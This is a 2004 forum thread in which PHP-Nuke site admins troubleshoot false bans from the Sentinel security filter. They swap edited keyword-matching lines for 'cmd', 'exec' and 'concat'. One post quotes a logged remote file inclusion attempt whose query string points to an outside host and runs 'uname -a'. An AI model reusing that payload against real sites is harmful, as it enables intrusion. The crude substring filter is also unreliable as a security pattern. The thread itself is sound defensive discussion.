Author |
Message |
Dawg
RavenNuke(tm) Development Team
![](modules/Forums/images/avatars/46907b8543f928e08c8d7.gif)
Joined: Nov 07, 2003
Posts: 928
|
Posted:
Fri Jun 04, 2004 3:04 am |
|
Greetings Raven and all,
I installed Senitinal Last night. This morning I went to upload some new pictures to my site BOOM....I got the FULL effect. It does work!
I have the report it generated and info on excatly what I was doing hen it kicked in....I assume you would be interested in seeing it.
Where would you like the details sent to?
Dawg |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
stephen2417
Worker
![Worker Worker](modules/Forums/images/ranks/3stars.gif)
![](modules/Forums/images/avatars/4551873940eae4d6c0e00.gif)
Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH
|
Posted:
Fri Jun 04, 2004 3:07 am |
|
You may just post the info here.. Leaving the site name and other personal info out.. |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
Dawg
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Fri Jun 04, 2004 3:45 am |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
Raven
Site Admin/Owner
![](modules/Forums/images/avatars/45030c033f18773153cd2.gif)
Joined: Aug 27, 2002
Posts: 17088
|
Posted:
Fri Jun 04, 2004 5:02 am |
|
It's the &cmd value that is setting it off. We'll have to look into it. Thanks! |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
redville
New Member
![New Member New Member](modules/Forums/images/ranks/1star.gif)
![](modules/Forums/images/avatars/gallery/blank.gif)
Joined: Jan 22, 2004
Posts: 9
|
Posted:
Fri Jun 04, 2004 6:55 am |
|
After seeing this I checked gallery also and got banned when I tried to rebuild the thumbnails.
I had Sentinel 1.10 installed and then seen 1.20 was out so I installed it and got banned again.
I had not tried the ban function, but I see what it does now. Its great, even though as some have warned it did not crash my computer. I shut off my pop up blocker and was able to hit Alt&Ctrl&Delete and close it out, of course I was expecting it.
Can you tell me which function would control this so I can disable it for now, since I don't want a member to get accidently banned.
Thanks |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
Raven
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Fri Jun 04, 2004 7:02 am |
|
Rather than turn it completely off which could leave you vulnerable, try this first. Find this code on or about line 109 in includes/sentinel.phpCode: if (eregi("http\:\/\/", $name) OR eregi("cmd",$querystring) OR eregi("exec",$querystring) OR eregi("concat",$querystring)) {
| and modify it toCode: if (eregi("http\:\/\/", $name) OR (eregi("cmd",$querystring) AND !eregi("&cmd",$querystring)) OR eregi("exec",$querystring) OR eregi("concat",$querystring)) {
|
|
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
redville
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Fri Jun 04, 2004 7:04 am |
|
Figured it out, its the string query that is setting it off.
I shut it off and was able to admin gallery. |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
redville
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Fri Jun 04, 2004 7:18 am |
|
Of course this is what is causing it in the sentinel.php "OR eregi("cmd",$querystring)" because I removed it, enabled the query string again, and was able to admin the gallery without being banned.
Is it possible to rewrite it so admin's or approved members can use the gallery functions but anyone else it would set off the ban.
Thanks |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
redville
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Fri Jun 04, 2004 7:19 am |
|
Sorry Raven, you must have been posting while I was.
Thanks |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
redville
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Fri Jun 04, 2004 7:25 am |
|
That fix did it, I didn't get banned for rebuilding the thumbs this time. |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
Dawg
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Fri Jun 04, 2004 7:25 pm |
|
Raven,
Will this work for anyone with "Photo" access or just an admin?
I give Photo Galleries to my registered members. (I run a Sport Fishing Site) and The members that use this feature have control over their own gallery. Will this work? or will they be banned?
Dawg |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
Raven
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Fri Jun 04, 2004 7:28 pm |
|
It should work for any uri request_stirng containing &cmd |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
NovemberRain
New Member
![New Member New Member](modules/Forums/images/ranks/1star.gif)
![](modules/Forums/images/avatars/gallery/blank.gif)
Joined: Jul 12, 2003
Posts: 8
Location: Istanbul
|
Posted:
Sat Jun 05, 2004 1:12 pm |
|
|
![ICQ Number ICQ Number](themes/RavenIce/forums/images/lang_english/icon_icq_add.gif) |
![](themes/RavenIce/forums/images/spacer.gif) |
sixonetonoffun
Spouse Contemplates Divorce
![](modules/Forums/images/avatars/d1ecfa674c890aee2698b.jpg)
Joined: Jan 02, 2003
Posts: 2496
|
Posted:
Sat Jun 05, 2004 4:29 pm |
|
Its the username exec is a substring of executer
You'll have to decide either to remove the exec code or set the filter to email only for now. |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
sixonetonoffun
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Sat Jun 05, 2004 5:34 pm |
|
Building on what Raven did with cmd above NovemberRain try this its working ok for me but I only tested it briefly.
Around line 112 in includes/sentinel.php
change this line
if (eregi("http\:\/\/", $name) OR eregi("cmd",$querystring) OR eregi("exec",$querystring) OR eregi("concat",$querystring)) {
To this:
Code:
if (eregi("http\:\/\/", $name) OR (eregi("cmd",$querystring) AND !eregi("&cmd",$querystring)) OR eregi("exec",$querystring) AND !eregi("execu",$querystring) OR eregi("concat",$querystring)) {
|
|
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
ballymuntrev
Hangin' Around
![](modules/Forums/images/avatars/blank.gif)
Joined: Mar 22, 2004
Posts: 49
|
Posted:
Sat Jun 05, 2004 5:45 pm |
|
I got this one today...
Code:X-Mailer: Sentinelâ„¢
Date: Sat, 05 Jun 2004 18:02:03 +0100
Date & Time: 2004-06-05 18:02:03
Blocked IP: 81.0.234.209
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: Python-urllib/1.15
Query String: www.mydublin.org/crew/modules.php?name=http://sweb.cz/sheepland/cmd&cmd=uname+-a
Forwarded For: none
Client IP: none
Remote Address: 81.0.234.209
Remote Port: 56335
Request Method: GET
--------------------
Who-Is for IP
81.0.234.209
|
Is that the same as what others said above ? Or was it really a hack/exploit attempt ?
Ta,
Trev. |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
sixonetonoffun
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Sat Jun 05, 2004 5:59 pm |
|
Trev,
That was a legit attack. |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
ballymuntrev
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Sat Jun 05, 2004 6:00 pm |
|
Thanks six ![Smile](modules/Forums/images/smiles/icon_smile.gif) |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
sixonetonoffun
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Sat Jun 05, 2004 6:05 pm |
|
Grr and your attacker while stupid enough to leave indexing on encoded his variable names lol!!!!! |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
twelves
Regular
![Regular Regular](modules/Forums/images/ranks/2stars.gif)
![](modules/Forums/images/avatars/068.gif)
Joined: Aug 22, 2003
Posts: 84
|
Posted:
Sun Jun 06, 2004 11:29 am |
|
A valid user got this:
Reason: Abuse - SCRIPT
Query String: www.blah.com/modules.php?name=Web_Links&l_op=viewlinkdetails&lid=96&ttitle=Cube-Tec_(formerly_Spectral_Design)
Forwarded For: none
Client IP: none
Remote Address: 213.217.**.*
Remote Port: 56473
Request Method: GET
![Embarassed](modules/Forums/images/smiles/icon_redface.gif) |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
sixonetonoffun
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Sun Jun 06, 2004 11:46 am |
|
Yep thats the () in the title. This has been reported we're looking into options to qualify the filter but there are so many potential mis uses its hard to create something that is going to still catch all the evil. Yet allow the good ones through while maintaining an acceptable level of performance.
Its best to just not allow them. |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
Raven
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Sun Jun 06, 2004 12:56 pm |
|
I agree with Six. You could also just set the setting to E-Mail only and that way you can look at each occurrence and respond accordingly. I'd just avoid the () in my titles ![Smile](modules/Forums/images/smiles/icon_smile.gif) |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
NovemberRain
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Tue Jun 15, 2004 9:54 am |
|
Code:Date & Time: 2004-06-15 13:57:31
Blocked IP: **.***.****
User ID: Joe_Sadriabi (102)
Reason: Abuse - SCRIPT
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Query String: www.xxxx.com/modules.php?op=modload&name=Kalender&file=submit
Forwarded For:xxxxx
Client IP: none
Remote Address: xxxxxx
Remote Port: 41499
Request Method: POST
--------------------
Who-Is for IP
xxxxxxxxx
|
Code:Date & Time: 2004-06-15 14:12:10
Blocked IP: xxxxxxxxx
User ID: Joe_Sadriabi (102)
Reason: Abuse - SCRIPT
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Query String: www.xxxxxx.com/modules.php?name=Submit_News
Forwarded For: xxxxxxxxxxx
Client IP: none
Remote Address: xxxxxxxxxx
Remote Port: 50165
Request Method: POST
--------------------
Who-Is for IP
xxxxxx
|
Code:Date & Time: 2004-06-15 14:13:05
Blocked IP: xxxxxxxx
User ID: Joe_Sadriabi (102)
Reason: Abuse - SCRIPT
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Query String: www.xxxxxx.com/modules.php?name=Submit_News
Forwarded For: xxxxxxx
Client IP: none
Remote Address: xxxxxxxx
Remote Port: 57845
Request Method: POST
--------------------
Who-Is for IP
xxxxxxxxx
|
|
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
NovemberRain
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Tue Jun 15, 2004 3:01 pm |
|
Code:Date & Time: 2004-06-15 23:40:15
Blocked IP: xxxxxxxx
User ID: cmdmrr (4368)
Reason: Abuse - OTHER
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Query String: www.xxxx.com/modules.php?name=Your_Account&op=userinfo&bypass=1&username=cmdmrr
Forwarded For: none
Client IP: none
Remote Address: xxxxxxxxxxx
Remote Port: 1408
Request Method: GET
--------------------
Who-Is for IP
xxxxxxx
|
|
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
Raven
![](modules/Forums/images/avatars/gallery/blank.gif)
|
Posted:
Tue Jun 15, 2004 3:11 pm |
|
This last one is answered in this very thread on this very page, up above. |
|
|
|
![](themes/RavenIce/forums/images/spacer.gif) |
|